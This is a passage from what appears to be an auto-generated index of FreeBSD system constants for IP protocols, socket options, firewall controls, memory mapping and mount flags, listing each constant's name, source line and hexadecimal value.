INPCK = 0x10 constant IN_CLASSA_HOST (line 706) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 707) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 708) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 709) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 710) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 711) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 712) | IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 713) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 714) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 715) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 716) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLASSD_HOST (line 717) | IN_CLASSD_HOST = 0xfffffff constant IN_CLASSD_NET (line 718) | IN_CLASSD_NET = 0xf0000000 constant IN_CLASSD_NSHIFT (line 719) | IN_CLASSD_NSHIFT = 0x1c constant IN_LOOPBACKNET (line 720) | IN_LOOPBACKNET = 0x7f constant IN_RFC3021_MASK (line 721) | IN_RFC3021_MASK = 0xfffffffe constant IPPROTO_3PC (line 722) | IPPROTO_3PC = 0x22 constant IPPROTO_ADFS (line 723) | IPPROTO_ADFS = 0x44 constant IPPROTO_AH (line 724) | IPPROTO_AH = 0x33 constant IPPROTO_AHIP (line 725) | IPPROTO_AHIP = 0x3d constant IPPROTO_APES (line 726) | IPPROTO_APES = 0x63 constant IPPROTO_ARGUS (line 727) | IPPROTO_ARGUS = 0xd constant IPPROTO_AX25 (line 728) | IPPROTO_AX25 = 0x5d constant IPPROTO_BHA (line 729) | IPPROTO_BHA = 0x31 constant IPPROTO_BLT (line 730) | IPPROTO_BLT = 0x1e constant IPPROTO_BRSATMON (line 731) | IPPROTO_BRSATMON = 0x4c constant IPPROTO_CARP (line 732) | IPPROTO_CARP = 0x70 constant IPPROTO_CFTP (line 733) | IPPROTO_CFTP = 0x3e constant IPPROTO_CHAOS (line 734) | IPPROTO_CHAOS = 0x10 constant IPPROTO_CMTP (line 735) | IPPROTO_CMTP = 0x26 constant IPPROTO_CPHB (line 736) | IPPROTO_CPHB = 0x49 constant IPPROTO_CPNX (line 737) | IPPROTO_CPNX = 0x48 constant IPPROTO_DCCP (line 738) | IPPROTO_DCCP = 0x21 constant IPPROTO_DDP (line 739) | IPPROTO_DDP = 0x25 constant IPPROTO_DGP (line 740) | IPPROTO_DGP = 0x56 constant IPPROTO_DIVERT (line 741) | IPPROTO_DIVERT = 0x102 constant IPPROTO_DONE (line 742) | IPPROTO_DONE = 0x101 constant IPPROTO_DSTOPTS (line 743) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 744) | IPPROTO_EGP = 0x8 constant IPPROTO_EMCON (line 745) | IPPROTO_EMCON = 0xe constant IPPROTO_ENCAP (line 746) | IPPROTO_ENCAP = 0x62 constant IPPROTO_EON (line 747) | IPPROTO_EON = 0x50 constant IPPROTO_ESP (line 748) | IPPROTO_ESP = 0x32 constant IPPROTO_ETHERIP (line 749) | IPPROTO_ETHERIP = 0x61 constant IPPROTO_FRAGMENT (line 750) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GGP (line 751) | IPPROTO_GGP = 0x3 constant IPPROTO_GMTP (line 752) | IPPROTO_GMTP = 0x64 constant IPPROTO_GRE (line 753) | IPPROTO_GRE = 0x2f constant IPPROTO_HELLO (line 754) | IPPROTO_HELLO = 0x3f constant IPPROTO_HIP (line 755) | IPPROTO_HIP = 0x8b constant IPPROTO_HMP (line 756) | IPPROTO_HMP = 0x14 constant IPPROTO_HOPOPTS (line 757) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 758) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 759) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 760) | IPPROTO_IDP = 0x16 constant IPPROTO_IDPR (line 761) | IPPROTO_IDPR = 0x23 constant IPPROTO_IDRP (line 762) | IPPROTO_IDRP = 0x2d constant IPPROTO_IGMP (line 763) | IPPROTO_IGMP = 0x2 constant IPPROTO_IGP (line 764) | IPPROTO_IGP = 0x55 constant IPPROTO_IGRP (line 765) | IPPROTO_IGRP = 0x58 constant IPPROTO_IL (line 766) | IPPROTO_IL = 0x28 constant IPPROTO_INLSP (line 767) | IPPROTO_INLSP = 0x34 constant IPPROTO_INP (line 768) | IPPROTO_INP = 0x20 constant IPPROTO_IP (line 769) | IPPROTO_IP = 0x0 constant IPPROTO_IPCOMP (line 770) | IPPROTO_IPCOMP = 0x6c constant IPPROTO_IPCV (line 771) | IPPROTO_IPCV = 0x47 constant IPPROTO_IPEIP (line 772) | IPPROTO_IPEIP = 0x5e constant IPPROTO_IPIP (line 773) | IPPROTO_IPIP = 0x4 constant IPPROTO_IPPC (line 774) | IPPROTO_IPPC = 0x43 constant IPPROTO_IPV4 (line 775) | IPPROTO_IPV4 = 0x4 constant IPPROTO_IPV6 (line 776) | IPPROTO_IPV6 = 0x29 constant IPPROTO_IRTP (line 777) | IPPROTO_IRTP = 0x1c constant IPPROTO_KRYPTOLAN (line 778) | IPPROTO_KRYPTOLAN = 0x41 constant IPPROTO_LARP (line 779) | IPPROTO_LARP = 0x5b constant IPPROTO_LEAF1 (line 780) | IPPROTO_LEAF1 = 0x19 constant IPPROTO_LEAF2 (line 781) | IPPROTO_LEAF2 = 0x1a constant IPPROTO_MAX (line 782) | IPPROTO_MAX = 0x100 constant IPPROTO_MEAS (line 783) | IPPROTO_MEAS = 0x13 constant IPPROTO_MH (line 784) | IPPROTO_MH = 0x87 constant IPPROTO_MHRP (line 785) | IPPROTO_MHRP = 0x30 constant IPPROTO_MICP (line 786) | IPPROTO_MICP = 0x5f constant IPPROTO_MOBILE (line 787) | IPPROTO_MOBILE = 0x37 constant IPPROTO_MPLS (line 788) | IPPROTO_MPLS = 0x89 constant IPPROTO_MTP (line 789) | IPPROTO_MTP = 0x5c constant IPPROTO_MUX (line 790) | IPPROTO_MUX = 0x12 constant IPPROTO_ND (line 791) | IPPROTO_ND = 0x4d constant IPPROTO_NHRP (line 792) | IPPROTO_NHRP = 0x36 constant IPPROTO_NONE (line 793) | IPPROTO_NONE = 0x3b constant IPPROTO_NSP (line 794) | IPPROTO_NSP = 0x1f constant IPPROTO_NVPII (line 795) | IPPROTO_NVPII = 0xb constant IPPROTO_OLD_DIVERT (line 796) | IPPROTO_OLD_DIVERT = 0xfe constant IPPROTO_OSPFIGP (line 797) | IPPROTO_OSPFIGP = 0x59 constant IPPROTO_PFSYNC (line 798) | IPPROTO_PFSYNC = 0xf0 constant IPPROTO_PGM (line 799) | IPPROTO_PGM = 0x71 constant IPPROTO_PIGP (line 800) | IPPROTO_PIGP = 0x9 constant IPPROTO_PIM (line 801) | IPPROTO_PIM = 0x67 constant IPPROTO_PRM (line 802) | IPPROTO_PRM = 0x15 constant IPPROTO_PUP (line 803) | IPPROTO_PUP = 0xc constant IPPROTO_PVP (line 804) | IPPROTO_PVP = 0x4b constant IPPROTO_RAW (line 805) | IPPROTO_RAW = 0xff constant IPPROTO_RCCMON (line 806) | IPPROTO_RCCMON = 0xa constant IPPROTO_RDP (line 807) | IPPROTO_RDP = 0x1b constant IPPROTO_RESERVED_253 (line 808) | IPPROTO_RESERVED_253 = 0xfd constant IPPROTO_RESERVED_254 (line 809) | IPPROTO_RESERVED_254 = 0xfe constant IPPROTO_ROUTING (line 810) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 811) | IPPROTO_RSVP = 0x2e constant IPPROTO_RVD (line 812) | IPPROTO_RVD = 0x42 constant IPPROTO_SATEXPAK (line 813) | IPPROTO_SATEXPAK = 0x40 constant IPPROTO_SATMON (line 814) | IPPROTO_SATMON = 0x45 constant IPPROTO_SCCSP (line 815) | IPPROTO_SCCSP = 0x60 constant IPPROTO_SCTP (line 816) | IPPROTO_SCTP = 0x84 constant IPPROTO_SDRP (line 817) | IPPROTO_SDRP = 0x2a constant IPPROTO_SEND (line 818) | IPPROTO_SEND = 0x103 constant IPPROTO_SHIM6 (line 819) | IPPROTO_SHIM6 = 0x8c constant IPPROTO_SKIP (line 820) | IPPROTO_SKIP = 0x39 constant IPPROTO_SPACER (line 821) | IPPROTO_SPACER = 0x7fff constant IPPROTO_SRPC (line 822) | IPPROTO_SRPC = 0x5a constant IPPROTO_ST (line 823) | IPPROTO_ST = 0x7 constant IPPROTO_SVMTP (line 824) | IPPROTO_SVMTP = 0x52 constant IPPROTO_SWIPE (line 825) | IPPROTO_SWIPE = 0x35 constant IPPROTO_TCF (line 826) | IPPROTO_TCF = 0x57 constant IPPROTO_TCP (line 827) | IPPROTO_TCP = 0x6 constant IPPROTO_TLSP (line 828) | IPPROTO_TLSP = 0x38 constant IPPROTO_TP (line 829) | IPPROTO_TP = 0x1d constant IPPROTO_TPXX (line 830) | IPPROTO_TPXX = 0x27 constant IPPROTO_TRUNK1 (line 831) | IPPROTO_TRUNK1 = 0x17 constant IPPROTO_TRUNK2 (line 832) | IPPROTO_TRUNK2 = 0x18 constant IPPROTO_TTP (line 833) | IPPROTO_TTP = 0x54 constant IPPROTO_UDP (line 834) | IPPROTO_UDP = 0x11 constant IPPROTO_UDPLITE (line 835) | IPPROTO_UDPLITE = 0x88 constant IPPROTO_VINES (line 836) | IPPROTO_VINES = 0x53 constant IPPROTO_VISA (line 837) | IPPROTO_VISA = 0x46 constant IPPROTO_VMTP (line 838) | IPPROTO_VMTP = 0x51 constant IPPROTO_WBEXPAK (line 839) | IPPROTO_WBEXPAK = 0x4f constant IPPROTO_WBMON (line 840) | IPPROTO_WBMON = 0x4e constant IPPROTO_WSN (line 841) | IPPROTO_WSN = 0x4a constant IPPROTO_XNET (line 842) | IPPROTO_XNET = 0xf constant IPPROTO_XTP (line 843) | IPPROTO_XTP = 0x24 constant IPV6_AUTOFLOWLABEL (line 844) | IPV6_AUTOFLOWLABEL = 0x3b constant IPV6_BINDANY (line 845) | IPV6_BINDANY = 0x40 constant IPV6_BINDMULTI (line 846) | IPV6_BINDMULTI = 0x41 constant IPV6_BINDV6ONLY (line 847) | IPV6_BINDV6ONLY = 0x1b constant IPV6_CHECKSUM (line 848) | IPV6_CHECKSUM = 0x1a constant IPV6_DEFAULT_MULTICAST_HOPS (line 849) | IPV6_DEFAULT_MULTICAST_HOPS = 0x1 constant IPV6_DEFAULT_MULTICAST_LOOP (line 850) | IPV6_DEFAULT_MULTICAST_LOOP = 0x1 constant IPV6_DEFHLIM (line 851) | IPV6_DEFHLIM = 0x40 constant IPV6_DONTFRAG (line 852) | IPV6_DONTFRAG = 0x3e constant IPV6_DSTOPTS (line 853) | IPV6_DSTOPTS = 0x32 constant IPV6_FLOWID (line 854) | IPV6_FLOWID = 0x43 constant IPV6_FLOWINFO_MASK (line 855) | IPV6_FLOWINFO_MASK = 0xffffff0f constant IPV6_FLOWLABEL_LEN (line 856) | IPV6_FLOWLABEL_LEN = 0x14 constant IPV6_FLOWLABEL_MASK (line 857) | IPV6_FLOWLABEL_MASK = 0xffff0f00 constant IPV6_FLOWTYPE (line 858) | IPV6_FLOWTYPE = 0x44 constant IPV6_FRAGTTL (line 859) | IPV6_FRAGTTL = 0x78 constant IPV6_FW_ADD (line 860) | IPV6_FW_ADD = 0x1e constant IPV6_FW_DEL (line 861) | IPV6_FW_DEL = 0x1f constant IPV6_FW_FLUSH (line 862) | IPV6_FW_FLUSH = 0x20 constant IPV6_FW_GET (line 863) | IPV6_FW_GET = 0x22 constant IPV6_FW_ZERO (line 864) | IPV6_FW_ZERO = 0x21 constant IPV6_HLIMDEC (line 865) | IPV6_HLIMDEC = 0x1 constant IPV6_HOPLIMIT (line 866) | IPV6_HOPLIMIT = 0x2f constant IPV6_HOPOPTS (line 867) | IPV6_HOPOPTS = 0x31 constant IPV6_IPSEC_POLICY (line 868) | IPV6_IPSEC_POLICY = 0x1c constant IPV6_JOIN_GROUP (line 869) | IPV6_JOIN_GROUP = 0xc constant IPV6_LEAVE_GROUP (line 870) | IPV6_LEAVE_GROUP = 0xd constant IPV6_MAXHLIM (line 871) | IPV6_MAXHLIM = 0xff constant IPV6_MAXOPTHDR (line 872) | IPV6_MAXOPTHDR = 0x800 constant IPV6_MAXPACKET (line 873) | IPV6_MAXPACKET = 0xffff constant IPV6_MAX_GROUP_SRC_FILTER (line 874) | IPV6_MAX_GROUP_SRC_FILTER = 0x200 constant IPV6_MAX_MEMBERSHIPS (line 875) | IPV6_MAX_MEMBERSHIPS = 0xfff constant IPV6_MAX_SOCK_SRC_FILTER (line 876) | IPV6_MAX_SOCK_SRC_FILTER = 0x80 constant IPV6_MMTU (line 877) | IPV6_MMTU = 0x500 constant IPV6_MSFILTER (line 878) | IPV6_MSFILTER = 0x4a constant IPV6_MULTICAST_HOPS (line 879) | IPV6_MULTICAST_HOPS = 0xa constant IPV6_MULTICAST_IF (line 880) | IPV6_MULTICAST_IF = 0x9 constant IPV6_MULTICAST_LOOP (line 881) | IPV6_MULTICAST_LOOP = 0xb constant IPV6_NEXTHOP (line 882) | IPV6_NEXTHOP = 0x30 constant IPV6_ORIGDSTADDR (line 883) | IPV6_ORIGDSTADDR = 0x48 constant IPV6_PATHMTU (line 884) | IPV6_PATHMTU = 0x2c constant IPV6_PKTINFO (line 885) | IPV6_PKTINFO = 0x2e constant IPV6_PORTRANGE (line 886) | IPV6_PORTRANGE = 0xe constant IPV6_PORTRANGE_DEFAULT (line 887) | IPV6_PORTRANGE_DEFAULT = 0x0 constant IPV6_PORTRANGE_HIGH (line 888) | IPV6_PORTRANGE_HIGH = 0x1 constant IPV6_PORTRANGE_LOW (line 889) | IPV6_PORTRANGE_LOW = 0x2 constant IPV6_PREFER_TEMPADDR (line 890) | IPV6_PREFER_TEMPADDR = 0x3f constant IPV6_RECVDSTOPTS (line 891) | IPV6_RECVDSTOPTS = 0x28 constant IPV6_RECVFLOWID (line 892) | IPV6_RECVFLOWID = 0x46 constant IPV6_RECVHOPLIMIT (line 893) | IPV6_RECVHOPLIMIT = 0x25 constant IPV6_RECVHOPOPTS (line 894) | IPV6_RECVHOPOPTS = 0x27 constant IPV6_RECVORIGDSTADDR (line 895) | IPV6_RECVORIGDSTADDR = 0x48 constant IPV6_RECVPATHMTU (line 896) | IPV6_RECVPATHMTU = 0x2b constant IPV6_RECVPKTINFO (line 897) | IPV6_RECVPKTINFO = 0x24 constant IPV6_RECVRSSBUCKETID (line 898) | IPV6_RECVRSSBUCKETID = 0x47 constant IPV6_RECVRTHDR (line 899) | IPV6_RECVRTHDR = 0x26 constant IPV6_RECVTCLASS (line 900) | IPV6_RECVTCLASS = 0x39 constant IPV6_RSSBUCKETID (line 901) | IPV6_RSSBUCKETID = 0x45 constant IPV6_RSS_LISTEN_BUCKET (line 902) | IPV6_RSS_LISTEN_BUCKET = 0x42 constant IPV6_RTHDR (line 903) | IPV6_RTHDR = 0x33 constant IPV6_RTHDRDSTOPTS (line 904) | IPV6_RTHDRDSTOPTS = 0x23 constant IPV6_RTHDR_LOOSE (line 905) | IPV6_RTHDR_LOOSE = 0x0 constant IPV6_RTHDR_STRICT (line 906) | IPV6_RTHDR_STRICT = 0x1 constant IPV6_RTHDR_TYPE_0 (line 907) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_SOCKOPT_RESERVED1 (line 908) | IPV6_SOCKOPT_RESERVED1 = 0x3 constant IPV6_TCLASS (line 909) | IPV6_TCLASS = 0x3d constant IPV6_UNICAST_HOPS (line 910) | IPV6_UNICAST_HOPS = 0x4 constant IPV6_USE_MIN_MTU (line 911) | IPV6_USE_MIN_MTU = 0x2a constant IPV6_V6ONLY (line 912) | IPV6_V6ONLY = 0x1b constant IPV6_VERSION (line 913) | IPV6_VERSION = 0x60 constant IPV6_VERSION_MASK (line 914) | IPV6_VERSION_MASK = 0xf0 constant IPV6_VLAN_PCP (line 915) | IPV6_VLAN_PCP = 0x4b constant IP_ADD_MEMBERSHIP (line 916) | IP_ADD_MEMBERSHIP = 0xc constant IP_ADD_SOURCE_MEMBERSHIP (line 917) | IP_ADD_SOURCE_MEMBERSHIP = 0x46 constant IP_BINDANY (line 918) | IP_BINDANY = 0x18 constant IP_BINDMULTI (line 919) | IP_BINDMULTI = 0x19 constant IP_BLOCK_SOURCE (line 920) | IP_BLOCK_SOURCE = 0x48 constant IP_DEFAULT_MULTICAST_LOOP (line 921) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 922) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 923) | IP_DF = 0x4000 constant IP_DONTFRAG (line 924) | IP_DONTFRAG = 0x43 constant IP_DROP_MEMBERSHIP (line 925) | IP_DROP_MEMBERSHIP = 0xd constant IP_DROP_SOURCE_MEMBERSHIP (line 926) | IP_DROP_SOURCE_MEMBERSHIP = 0x47 constant IP_DUMMYNET3 (line 927) | IP_DUMMYNET3 = 0x31 constant IP_DUMMYNET_CONFIGURE (line 928) | IP_DUMMYNET_CONFIGURE = 0x3c constant IP_DUMMYNET_DEL (line 929) | IP_DUMMYNET_DEL = 0x3d constant IP_DUMMYNET_FLUSH (line 930) | IP_DUMMYNET_FLUSH = 0x3e constant IP_DUMMYNET_GET (line 931) | IP_DUMMYNET_GET = 0x40 constant IP_FLOWID (line 932) | IP_FLOWID = 0x5a constant IP_FLOWTYPE (line 933) | IP_FLOWTYPE = 0x5b constant IP_FW3 (line 934) | IP_FW3 = 0x30 constant IP_FW_ADD (line 935) | IP_FW_ADD = 0x32 constant IP_FW_DEL (line 936) | IP_FW_DEL = 0x33 constant IP_FW_FLUSH (line 937) | IP_FW_FLUSH = 0x34 constant IP_FW_GET (line 938) | IP_FW_GET = 0x36 constant IP_FW_NAT_CFG (line 939) | IP_FW_NAT_CFG = 0x38 constant IP_FW_NAT_DEL (line 940) | IP_FW_NAT_DEL = 0x39 constant IP_FW_NAT_GET_CONFIG (line 941) | IP_FW_NAT_GET_CONFIG = 0x3a constant IP_FW_NAT_GET_LOG (line 942) | IP_FW_NAT_GET_LOG = 0x3b constant IP_FW_RESETLOG (line 943) | IP_FW_RESETLOG = 0x37 constant IP_FW_TABLE_ADD (line 944) | IP_FW_TABLE_ADD = 0x28 constant IP_FW_TABLE_DEL (line 945) | IP_FW_TABLE_DEL = 0x29 constant IP_FW_TABLE_FLUSH (line 946) | IP_FW_TABLE_FLUSH = 0x2a constant IP_FW_TABLE_GETSIZE (line 947) | IP_FW_TABLE_GETSIZE = 0x2b constant IP_FW_TABLE_LIST (line 948) | IP_FW_TABLE_LIST = 0x2c constant IP_FW_ZERO (line 949) | IP_FW_ZERO = 0x35 constant IP_HDRINCL (line 950) | IP_HDRINCL = 0x2 constant IP_IPSEC_POLICY (line 951) | IP_IPSEC_POLICY = 0x15 constant IP_MAXPACKET (line 952) | IP_MAXPACKET = 0xffff constant IP_MAX_GROUP_SRC_FILTER (line 953) | IP_MAX_GROUP_SRC_FILTER = 0x200 constant IP_MAX_MEMBERSHIPS (line 954) | IP_MAX_MEMBERSHIPS = 0xfff constant IP_MAX_SOCK_MUTE_FILTER (line 955) | IP_MAX_SOCK_MUTE_FILTER = 0x80 constant IP_MAX_SOCK_SRC_FILTER (line 956) | IP_MAX_SOCK_SRC_FILTER = 0x80 constant IP_MF (line 957) | IP_MF = 0x2000 constant IP_MINTTL (line 958) | IP_MINTTL = 0x42 constant IP_MSFILTER (line 959) | IP_MSFILTER = 0x4a constant IP_MSS (line 960) | IP_MSS = 0x240 constant IP_MULTICAST_IF (line 961) | IP_MULTICAST_IF = 0x9 constant IP_MULTICAST_LOOP (line 962) | IP_MULTICAST_LOOP = 0xb constant IP_MULTICAST_TTL (line 963) | IP_MULTICAST_TTL = 0xa constant IP_MULTICAST_VIF (line 964) | IP_MULTICAST_VIF = 0xe constant IP_OFFMASK (line 965) | IP_OFFMASK = 0x1fff constant IP_ONESBCAST (line 966) | IP_ONESBCAST = 0x17 constant IP_OPTIONS (line 967) | IP_OPTIONS = 0x1 constant IP_ORIGDSTADDR (line 968) | IP_ORIGDSTADDR = 0x1b constant IP_PORTRANGE (line 969) | IP_PORTRANGE = 0x13 constant IP_PORTRANGE_DEFAULT (line 970) | IP_PORTRANGE_DEFAULT = 0x0 constant IP_PORTRANGE_HIGH (line 971) | IP_PORTRANGE_HIGH = 0x1 constant IP_PORTRANGE_LOW (line 972) | IP_PORTRANGE_LOW = 0x2 constant IP_RECVDSTADDR (line 973) | IP_RECVDSTADDR = 0x7 constant IP_RECVFLOWID (line 974) | IP_RECVFLOWID = 0x5d constant IP_RECVIF (line 975) | IP_RECVIF = 0x14 constant IP_RECVOPTS (line 976) | IP_RECVOPTS = 0x5 constant IP_RECVORIGDSTADDR (line 977) | IP_RECVORIGDSTADDR = 0x1b constant IP_RECVRETOPTS (line 978) | IP_RECVRETOPTS = 0x6 constant IP_RECVRSSBUCKETID (line 979) | IP_RECVRSSBUCKETID = 0x5e constant IP_RECVTOS (line 980) | IP_RECVTOS = 0x44 constant IP_RECVTTL (line 981) | IP_RECVTTL = 0x41 constant IP_RETOPTS (line 982) | IP_RETOPTS = 0x8 constant IP_RF (line 983) | IP_RF = 0x8000 constant IP_RSSBUCKETID (line 984) | IP_RSSBUCKETID = 0x5c constant IP_RSS_LISTEN_BUCKET (line 985) | IP_RSS_LISTEN_BUCKET = 0x1a constant IP_RSVP_OFF (line 986) | IP_RSVP_OFF = 0x10 constant IP_RSVP_ON (line 987) | IP_RSVP_ON = 0xf constant IP_RSVP_VIF_OFF (line 988) | IP_RSVP_VIF_OFF = 0x12 constant IP_RSVP_VIF_ON (line 989) | IP_RSVP_VIF_ON = 0x11 constant IP_SENDSRCADDR (line 990) | IP_SENDSRCADDR = 0x7 constant IP_TOS (line 991) | IP_TOS = 0x3 constant IP_TTL (line 992) | IP_TTL = 0x4 constant IP_UNBLOCK_SOURCE (line 993) | IP_UNBLOCK_SOURCE = 0x49 constant IP_VLAN_PCP (line 994) | IP_VLAN_PCP = 0x4b constant ISIG (line 995) | ISIG = 0x80 constant ISTRIP (line 996) | ISTRIP = 0x20 constant ITIMER_PROF (line 997) | ITIMER_PROF = 0x2 constant ITIMER_REAL (line 998) | ITIMER_REAL = 0x0 constant ITIMER_VIRTUAL (line 999) | ITIMER_VIRTUAL = 0x1 constant IXANY (line 1000) | IXANY = 0x800 constant IXOFF (line 1001) | IXOFF = 0x400 constant IXON (line 1002) | IXON = 0x200 constant KERN_HOSTNAME (line 1003) | KERN_HOSTNAME = 0xa constant KERN_OSRELEASE (line 1004) | KERN_OSRELEASE = 0x2 constant KERN_OSTYPE (line 1005) | KERN_OSTYPE = 0x1 constant KERN_VERSION (line 1006) | KERN_VERSION = 0x4 constant LOCAL_CONNWAIT (line 1007) | LOCAL_CONNWAIT = 0x4 constant LOCAL_CREDS (line 1008) | LOCAL_CREDS = 0x2 constant LOCAL_PEERCRED (line 1009) | LOCAL_PEERCRED = 0x1 constant LOCAL_VENDOR (line 1010) | LOCAL_VENDOR = 0x80000000 constant LOCK_EX (line 1011) | LOCK_EX = 0x2 constant LOCK_NB (line 1012) | LOCK_NB = 0x4 constant LOCK_SH (line 1013) | LOCK_SH = 0x1 constant LOCK_UN (line 1014) | LOCK_UN = 0x8 constant MADV_AUTOSYNC (line 1015) | MADV_AUTOSYNC = 0x7 constant MADV_CORE (line 1016) | MADV_CORE = 0x9 constant MADV_DONTNEED (line 1017) | MADV_DONTNEED = 0x4 constant MADV_FREE (line 1018) | MADV_FREE = 0x5 constant MADV_NOCORE (line 1019) | MADV_NOCORE = 0x8 constant MADV_NORMAL (line 1020) | MADV_NORMAL = 0x0 constant MADV_NOSYNC (line 1021) | MADV_NOSYNC = 0x6 constant MADV_PROTECT (line 1022) | MADV_PROTECT = 0xa constant MADV_RANDOM (line 1023) | MADV_RANDOM = 0x1 constant MADV_SEQUENTIAL (line 1024) | MADV_SEQUENTIAL = 0x2 constant MADV_WILLNEED (line 1025) | MADV_WILLNEED = 0x3 constant MAP_ALIGNED_SUPER (line 1026) | MAP_ALIGNED_SUPER = 0x1000000 constant MAP_ALIGNMENT_MASK (line 1027) | MAP_ALIGNMENT_MASK = -0x1000000 constant MAP_ALIGNMENT_SHIFT (line 1028) | MAP_ALIGNMENT_SHIFT = 0x18 constant MAP_ANON (line 1029) | MAP_ANON = 0x1000 constant MAP_ANONYMOUS (line 1030) | MAP_ANONYMOUS = 0x1000 constant MAP_COPY (line 1031) | MAP_COPY = 0x2 constant MAP_EXCL (line 1032) | MAP_EXCL = 0x4000 constant MAP_FILE (line 1033) | MAP_FILE = 0x0 constant MAP_FIXED (line 1034) | MAP_FIXED = 0x10 constant MAP_GUARD (line 1035) | MAP_GUARD = 0x2000 constant MAP_HASSEMAPHORE (line 1036) | MAP_HASSEMAPHORE = 0x200 constant MAP_NOCORE (line 1037) | MAP_NOCORE = 0x20000 constant MAP_NOSYNC (line 1038) | MAP_NOSYNC = 0x800 constant MAP_PREFAULT_READ (line 1039) | MAP_PREFAULT_READ = 0x40000 constant MAP_PRIVATE (line 1040) | MAP_PRIVATE = 0x2 constant MAP_RESERVED0020 (line 1041) | MAP_RESERVED0020 = 0x20 constant MAP_RESERVED0040 (line 1042) | MAP_RESERVED0040 = 0x40 constant MAP_RESERVED0080 (line 1043) | MAP_RESERVED0080 = 0x80 constant MAP_RESERVED0100 (line 1044) | MAP_RESERVED0100 = 0x100 constant MAP_SHARED (line 1045) | MAP_SHARED = 0x1 constant MAP_STACK (line 1046) | MAP_STACK = 0x400 constant MCAST_BLOCK_SOURCE (line 1047) | MCAST_BLOCK_SOURCE = 0x54 constant MCAST_EXCLUDE (line 1048) | MCAST_EXCLUDE = 0x2 constant MCAST_INCLUDE (line 1049) | MCAST_INCLUDE = 0x1 constant MCAST_JOIN_GROUP (line 1050) | MCAST_JOIN_GROUP = 0x50 constant MCAST_JOIN_SOURCE_GROUP (line 1051) | MCAST_JOIN_SOURCE_GROUP = 0x52 constant MCAST_LEAVE_GROUP (line 1052) | MCAST_LEAVE_GROUP = 0x51 constant MCAST_LEAVE_SOURCE_GROUP (line 1053) | MCAST_LEAVE_SOURCE_GROUP = 0x53 constant MCAST_UNBLOCK_SOURCE (line 1054) | MCAST_UNBLOCK_SOURCE = 0x55 constant MCAST_UNDEFINED (line 1055) | MCAST_UNDEFINED = 0x0 constant MCL_CURRENT (line 1056) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 1057) | MCL_FUTURE = 0x2 constant MNT_ACLS (line 1058) | MNT_ACLS = 0x8000000 constant MNT_ASYNC (line 1059) | MNT_ASYNC = 0x40 constant MNT_AUTOMOUNTED (line 1060) | MNT_AUTOMOUNTED = 0x200000000 constant MNT_BYFSID (line 1061) | MNT_BYFSID = 0x8000000 constant MNT_CMDFLAGS (line 1062) | MNT_CMDFLAGS = 0xd0f0000 constant MNT_DEFEXPORTED (line 1063) | MNT_DEFEXPORTED = 0x200 constant MNT_DELEXPORT (line 1064) | MNT_DELEXPORT = 0x20000 constant MNT_EXKERB (line 1065) | MNT_EXKERB = 0x800 constant MNT_EXPORTANON (line 1066) | MNT_EXPORTANON = 0x400 constant MNT_EXPORTED (line 1067) | MNT_EXPORTED = 0x100 constant MNT_EXPUBLIC (line 1068) | MNT_EXPUBLIC = 0x20000000 constant MNT_EXRDONLY (line 1069) | MNT_EXRDONLY = 0x80 constant MNT_FORCE (line 1070) | MNT_FORCE = 0x80000 constant MNT_GJOURNAL (line 1071) | MNT_GJOURNAL = 0x2000000 constant MNT_IGNORE (line 1072) | MNT_IGNORE = 0x800000 constant MNT_LAZY (line 1073) | MNT_LAZY = 0x3 constant MNT_LOCAL (line 1074) | MNT_LOCAL = 0x1000 constant MNT_MULTILABEL (line 1075) | MNT_MULTILABEL = 0x4000000 constant MNT_NFS4ACLS (line 1076) | MNT_NFS4ACLS = 0x10 constant MNT_NOATIME (line 1077) | MNT_NOATIME = 0x10000000 constant MNT_NOCLUSTERR (line 1078) | MNT_NOCLUSTERR = 0x40000000 constant MNT_NOCLUSTERW (line 1079) | MNT_NOCLUSTERW = 0x80000000 constant MNT_NOEXEC (line 1080) | MNT_NOEXEC = 0x4 constant MNT_NONBUSY (line 1081) | MNT_NONBUSY = 0x4000000 constant MNT_NOSUID (line 1082) | MNT_NOSUID = 0x8 constant MNT_NOSYMFOLLOW (line 1083) | MNT_NOSYMFOLLOW = 0x400000 constant MNT_NOWAIT (line 1084) | MNT_NOWAIT = 0x2 constant MNT_QUOTA (line 1085) | MNT_QUOTA = 0x2000 constant MNT_RDONLY (line 1086) | MNT_RDONLY = 0x1 constant MNT_RELOAD (line 1087) | MNT_RELOAD = 0x40000 constant MNT_ROOTFS (line 1088) | MNT_ROOTFS = 0x4000 constant MNT_SNAPSHOT (line 1089) | MNT_SNAPSHOT = 0x1000000 constant MNT_SOFTDEP (line 1090) | MNT_SOFTDEP = 0x200000 constant MNT_SUIDDIR (line 1091) | MNT_SUIDDIR = 0x100000 constant MNT_SUJ (line 1092) | MNT_SUJ = 0x100000000 constant MNT_SUSPEND (line 1093) | MNT_SUSPEND = 0x4 constant MNT_SYNCHRONOUS (line 1094) | MNT_SYNCHRONOUS = 0x2 constant MNT_UNION (line 1095) | MNT_UNION = 0x20 constant MNT_UNTRUSTED (line 1096) | MNT_UNTRUSTED = 0x800000000 constant MNT_UPDATE (line 1097) | MNT_UPDATE = 0x10000 constant MNT_UPDATEMASK (line 1098) | MNT_UPDATEMASK = 0xad8d0807e constant 